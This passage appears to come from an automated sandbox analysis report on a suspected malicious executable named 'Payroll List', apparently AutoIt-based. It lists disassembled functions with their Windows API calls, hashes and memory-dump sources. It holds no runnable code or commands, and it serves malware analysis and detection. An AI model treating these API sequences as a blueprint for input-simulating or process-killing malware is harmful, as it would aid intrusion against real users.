                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                    • String ID:
                                                                    • API String ID: 4137160315-0
                                                                    • Opcode ID: c9eb7ba1b25c09376cb0ccddbea86b0f5daa338613241f67963619ad0813a587
                                                                    • Instruction ID: 43e751ca4f29c6310c97133da55d777588c68747d3c9494898f050edda8a787d
                                                                    • Opcode Fuzzy Hash: c9eb7ba1b25c09376cb0ccddbea86b0f5daa338613241f67963619ad0813a587
                                                                    • Instruction Fuzzy Hash: 6731CF72504305ABD710DF54EC49F9AB7E9FF89314F00091AF589D7191DB31EA48CB92
                                                                    Function 0015AF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0015AFAE
                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 0015AFB5
                                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0015AFC4
                                                                    • CloseHandle.KERNEL32(00000004), ref: 0015AFCF
                                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0015AFFE
                                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 0015B012
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                    • String ID:
                                                                    • API String ID: 1413079979-0
                                                                    • Opcode ID: cd2f253dd01a6c21c061146e1cec0a5b2e2115f96d86f861994a7376892e8f20
                                                                    • Instruction ID: 721c896b58e8d8bbc262d42abf4142e0ba557fb145cf23daaedfa578f2b7de72
                                                                    • Opcode Fuzzy Hash: cd2f253dd01a6c21c061146e1cec0a5b2e2115f96d86f861994a7376892e8f20
                                                                    • Instruction Fuzzy Hash: D5218BB214420DEFCF028FA4ED09FAE7BA9EF45305F044115FE12AA561C3768D68EB61
                                                                    Function 0018EBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0013AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0013AFE3
                                                                      • Part of subcall function 0013AF83: SelectObject.GDI32(?,00000000), ref: 0013AFF2
                                                                      • Part of subcall function 0013AF83: BeginPath.GDI32(?), ref: 0013B009
                                                                      • Part of subcall function 0013AF83: SelectObject.GDI32(?,00000000), ref: 0013B033
                                                                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0018EC20
                                                                    • LineTo.GDI32(00000000,00000003,?), ref: 0018EC34
                                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0018EC42
                                                                    • LineTo.GDI32(00000000,00000000,?), ref: 0018EC52
                                                                    • EndPath.GDI32(00000000), ref: 0018EC62
                                                                    • StrokePath.GDI32(00000000), ref: 0018EC72
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                    • String ID:
                                                                    • API String ID: 43455801-0
                                                                    • Opcode ID: 2c7482715abfd3d054c8c07b7cdded8b3ef15710dd181d5848e7ac54c5722daf
                                                                    • Instruction ID: ba6b0eede4d24960829ec5e15343af6b322a31258638a90cbaff8aac4be4f79f
                                                                    • Opcode Fuzzy Hash: 2c7482715abfd3d054c8c07b7cdded8b3ef15710dd181d5848e7ac54c5722daf
                                                                    • Instruction Fuzzy Hash: C6111B7240014DBFEF029F90ED88EEA7F6DEF09350F048112BE0989560D7719E95DBA0
                                                                    Function 0015E19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 0015E1C0
                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0015E1D1
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0015E1D8
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0015E1E0
                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0015E1F7
                                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0015E209
                                                                      • Part of subcall function 00159AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00159A05,00000000,00000000,?,00159DDB), ref: 0015A53A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDevice$ExceptionRaiseRelease
                                                                    • String ID:
                                                                    • API String ID: 603618608-0
                                                                    • Opcode ID: 7eddf0cc109f34700736b3fbdee8c41a03a12eacb7c5729c954475f3ab0cc22c
                                                                    • Instruction ID: e9d6b4f9803a50a46ff50be676322fa1d8ed36bc2e33e6e28b3dba7433a4644c
                                                                    • Opcode Fuzzy Hash: 7eddf0cc109f34700736b3fbdee8c41a03a12eacb7c5729c954475f3ab0cc22c
                                                                    • Instruction Fuzzy Hash: 400184B5E40714BFEB109FA59C45B5EBFB8EB49351F004066FE09AB690D6709D01CFA0
                                                                    Function 00147B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __init_pointers.LIBCMT ref: 00147B47
                                                                      • Part of subcall function 0014123A: __initp_misc_winsig.LIBCMT ref: 0014125E
                                                                      • Part of subcall function 0014123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00147F51
                                                                      • Part of subcall function 0014123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00147F65
                                                                      • Part of subcall function 0014123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00147F78
                                                                      • Part of subcall function 0014123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00147F8B
                                                                      • Part of subcall function 0014123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00147F9E
                                                                      • Part of subcall function 0014123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00147FB1
                                                                      • Part of subcall function 0014123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00147FC4
                                                                      • Part of subcall function 0014123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00147FD7
                                                                      • Part of subcall function 0014123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00147FEA
                                                                      • Part of subcall function 0014123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00147FFD
                                                                      • Part of subcall function 0014123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00148010
                                                                      • Part of subcall function 0014123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00148023
                                                                      • Part of subcall function 0014123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00148036
                                                                      • Part of subcall function 0014123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00148049
                                                                      • Part of subcall function 0014123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0014805C
                                                                      • Part of subcall function 0014123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0014806F
                                                                    • __mtinitlocks.LIBCMT ref: 00147B4C
                                                                      • Part of subcall function 00147E23: InitializeCriticalSectionAndSpinCount.KERNEL32(001DAC68,00000FA0,?,?,00147B51,00145E77,001D6C70,00000014), ref: 00147E41
                                                                    • __mtterm.LIBCMT ref: 00147B55
                                                                      • Part of subcall function 00147BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00147B5A,00145E77,001D6C70,00000014), ref: 00147D3F
                                                                      • Part of subcall function 00147BBD: _free.LIBCMT ref: 00147D46
                                                                      • Part of subcall function 00147BBD: DeleteCriticalSection.KERNEL32(001DAC68,?,?,00147B5A,00145E77,001D6C70,00000014), ref: 00147D68
                                                                    • __calloc_crt.LIBCMT ref: 00147B7A
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00147BA3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                    • String ID:
                                                                    • API String ID: 2942034483-0
                                                                    • Opcode ID: e7dfe620746c7bd78d25837b8c3f5e06c9a9d4107e3fafeede49a3b35683dc9f
                                                                    • Instruction ID: c81846a00ee2ef8d123ab5195319ab87fcd34131a78cf411b29f3214ceb4d431
                                                                    • Opcode Fuzzy Hash: e7dfe620746c7bd78d25837b8c3f5e06c9a9d4107e3fafeede49a3b35683dc9f
                                                                    • Instruction Fuzzy Hash: 82F0E93211E7121DE6347B34BC07A5B27C4DF12734B200B9AF964D54F2FF20888145A1
                                                                    Function 001227EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0012281D
                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00122825
                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00122830
                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0012283B
                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00122843
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0012284B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual
                                                                    • String ID:
                                                                    • API String ID: 4278518827-0
                                                                    • Opcode ID: eed0f7f1a260ed539e39c85eb1c6eadd6b11ebaed7f826121a2b19b4c87e710d
                                                                    • Instruction ID: 229e66c8567fcd513e82a5faa9b8d3d0395e5d7e3ffbaf7f99766c090ca35d52
                                                                    • Opcode Fuzzy Hash: eed0f7f1a260ed539e39c85eb1c6eadd6b11ebaed7f826121a2b19b4c87e710d
                                                                    • Instruction Fuzzy Hash: CF0167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C47A42C7F5A864CBE5
                                                                    Function 00169AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                    • String ID:
                                                                    • API String ID: 1423608774-0
                                                                    • Opcode ID: 2e8deb414f9eea46216f9975795a61de831a9c05749ceecb3ac64fef74b8f515
                                                                    • Instruction ID: e6f585f7e6371cfc1434bc91dfac542e1f8722e40a863b3ae828422c278e1c98
                                                                    • Opcode Fuzzy Hash: 2e8deb414f9eea46216f9975795a61de831a9c05749ceecb3ac64fef74b8f515
                                                                    • Instruction Fuzzy Hash: 6601A436102621ABDB151BA4FC48EFF77ADFF89702B44042AF50397CA0DB749850DB50
                                                                    Function 00167BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00167C07
                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00167C1D
                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00167C2C
                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00167C3B
                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00167C45
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00167C4C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                    • String ID:
                                                                    • API String ID: 839392675-0
                                                                    • Opcode ID: 949897f1df217cf0e8466bc2dc7a02df592f3b05c7b52bea293a0d7c4be3427d
                                                                    • Instruction ID: 94dca15a4964150e3a956f31fa774029f012f89fdd5779320145d15ea2098904
                                                                    • Opcode Fuzzy Hash: 949897f1df217cf0e8466bc2dc7a02df592f3b05c7b52bea293a0d7c4be3427d
                                                                    • Instruction Fuzzy Hash: 55F03A72241958BBE7215B62AC0EEEF7B7CEFC7B15F040018FA0691891E7A05A81C6B5
                                                                    Function 00169A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 00169A33
                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,00195DEE,?,?,?,?,?,0012ED63), ref: 00169A44
                                                                    • TerminateThread.KERNEL32(?,000001F6,?,?,?,00195DEE,?,?,?,?,?,0012ED63), ref: 00169A51
                                                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00195DEE,?,?,?,?,?,0012ED63), ref: 00169A5E
                                                                      • Part of subcall function 001693D1: CloseHandle.KERNEL32(?,?,00169A6B,?,?,?,00195DEE,?,?,?,?,?,0012ED63), ref: 001693DB
                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00169A71
                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,00195DEE,?,?,?,?,?,0012ED63), ref: 00169A78
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                    • String ID:
                                                                    • API String ID: 3495660284-0
                                                                    • Opcode ID: eca69a7614d60a70a673592d68703311dce366d592cb66740ae92293e6bae2b0
                                                                    • Instruction ID: 479088fa48d6cf14e7919cdcc52fc1781e363d54f6f0f7c6a7ff72a0b6d47239
                                                                    • Opcode Fuzzy Hash: eca69a7614d60a70a673592d68703311dce366d592cb66740ae92293e6bae2b0
                                                                    • Instruction Fuzzy Hash: 76F0E276141A01ABD7111BA4FC8CEEF3779FF86302B440026F10395CA0CB789850DB50
                                                                    Function 00121CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0013F4EA: std::exception::exception.LIBCMT ref: 0013F51E
                                                                      • Part of subcall function 0013F4EA: __CxxThrowException@8.LIBCMT ref: 0013F533
                                                                    • __swprintf.LIBCMT ref: 00121EA6
                                                                    Strings
                                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00121D49
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                    • API String ID: 2125237772-557222456
                                                                    • Opcode ID: c72eaf0b4be9728b05ddadb588cf653d8a76ab9c6ee411d902a1035574872ed2
                                                                    • Instruction ID: e71d1656ce8016da113a625475823c5b38c402aa0e409b3beb104ca507343737
                                                                    • Opcode Fuzzy Hash: c72eaf0b4be9728b05ddadb588cf653d8a76ab9c6ee411d902a1035574872ed2
                                                                    • Instruction Fuzzy Hash: A3919D71604221AFDB24EF24E895C6EB7F4BFA5700F01491DF895972A1DB70ED14CB92
                                                                    Function 0017AFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 0017B006
                                                                    • CharUpperBuffW.USER32(?,?), ref: 0017B115
                                                                    • VariantClear.OLEAUT32(?), ref: 0017B298
                                                                      • Part of subcall function 00169DC5: VariantInit.OLEAUT32(00000000), ref: 00169E05
                                                                      • Part of subcall function 00169DC5: VariantCopy.OLEAUT32(?,?), ref: 00169E0E
                                                                      • Part of subcall function 00169DC5: VariantClear.OLEAUT32(?), ref: 00169E1A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                    • API String ID: 4237274167-1221869570
                                                                    • Opcode ID: 73837905c053298bbc347d77c2b3b7fea2a5dcc272ca2e74c7ea9118f2826ff4
                                                                    • Instruction ID: 1ab8fbc13ebba7349b1f80bdfc674558393c9cd0bbb1c395f5798562650292a2
                                                                    • Opcode Fuzzy Hash: 73837905c053298bbc347d77c2b3b7fea2a5dcc272ca2e74c7ea9118f2826ff4
                                                                    • Instruction Fuzzy Hash: 40917A706083019FCB14DF24D495A5ABBF4BF99704F04886EF89A9B362DB31E945CB92
                                                                    Function 00165347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0013C6F4: _wcscpy.LIBCMT ref: 0013C717
                                                                    • _memset.LIBCMT ref: 00165438
                                                                    • GetMenuItemInfoW.USER32(?), ref: 00165467
                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00165513
                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0016553D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                    • String ID: 0
                                                                    • API String ID: 4152858687-4108050209
                                                                    • Opcode ID: 2e962f8c4bad9014b91fdc0ecee6e57c5fb2bf67c9a98018d0b8fa1489575bda
                                                                    • Instruction ID: 7e7f2774a4a4d95d96d9822865bde57fa4295de602d6b5520681b02d7b3956a4
                                                                    • Opcode Fuzzy Hash: 2e962f8c4bad9014b91fdc0ecee6e57c5fb2bf67c9a98018d0b8fa1489575bda
                                                                    • Instruction Fuzzy Hash: 14510371604B019BD7149F28CC496AFBBEAAF95754F04062EF896D3290EB70CD64CB52
                                                                    Function 00160213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0016027B
                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 001602B1
                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 001602C2
                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00160344
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                    • String ID: DllGetClassObject
                                                                    • API String ID: 753597075-1075368562
                                                                    • Opcode ID: 5952f20c9fa1ac6239f852609cf7d78f4b576b66c3ebb9ce57fb2ab9c488e614
                                                                    • Instruction ID: 0e7ae0cf08fb82cdaa0c16be6de1b94d5d148bf335dbff560d241886dab9e4a6
                                                                    • Opcode Fuzzy Hash: 5952f20c9fa1ac6239f852609cf7d78f4b576b66c3ebb9ce57fb2ab9c488e614
                                                                    • Instruction Fuzzy Hash: EF4149B1600604AFDB16CF64CC84B9B7BB9FF49316B1580A9E909DF306D7B1DA54CBA0
                                                                    Function 00165007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
